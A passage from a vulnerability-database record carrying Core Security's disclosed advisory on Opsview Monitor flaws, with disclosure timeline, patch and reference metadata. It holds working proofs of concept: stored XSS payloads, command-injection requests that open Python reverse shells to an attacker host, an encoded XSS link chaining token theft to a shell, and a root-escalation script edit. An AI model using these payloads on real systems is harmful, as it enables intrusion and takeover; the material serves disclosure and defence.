\u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. \nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16146",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17453",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16146",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"id": "VAR-201809-0904",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
}
]
},
"last_update_date": "2023-12-18T12:01:17.777000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "OpsviewMonitor command to execute the patch for the vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139521"
},
{
"title": "Opsview Monitor Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84507"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16146"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%2foiiplzt1c2vybmftzsa9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3zhcib4ahiyid0gbmv3ifhnteh0dhbszxf1zxn0kck7eghymi5vcgvukcdqt1nujywgjy9yzxn0l2nvbmzpzy9ub3rpzmljyxrpb25tzxrob2qvdgvzdg5vdglmawnhdglvbi8nlcb0cnvlktt4ahiylnnldfjlcxvlc3rizwfkzxioingtb3bzdmlldy11c2vybmftzsisihvzzxjuyw1lkttjb25zb2xllmxvzyh1c2vybmftzsk7y29uc29szs5sb2codg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiec1vchn2awv3lxrva2vuiiwgdg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiq29udgvudc1uexbliiwgimfwcgxpy2f0aw9ul2pzb24ikttib2r5id0geyjtzxnzywdlijoivgvzdcbnzxnzywdliiwiy29tbwfuzci6inn1ym1pdf94bxbwx3njcmlwdcisinzhcmlhymxlcyi6w10sinrlc3rfdmfyawfibgvzijpbeyjuyw1lijoiuefhrviilcj2ywx1zsi6ijeymzeymzeymyb8fcbwexrob24glwmgj2ltcg9ydcbzb2nrzxqsc3vichjvy2vzcyxvcztzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkttzlmnvbm5ly3qokfwipgf0dgfja2vysva%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
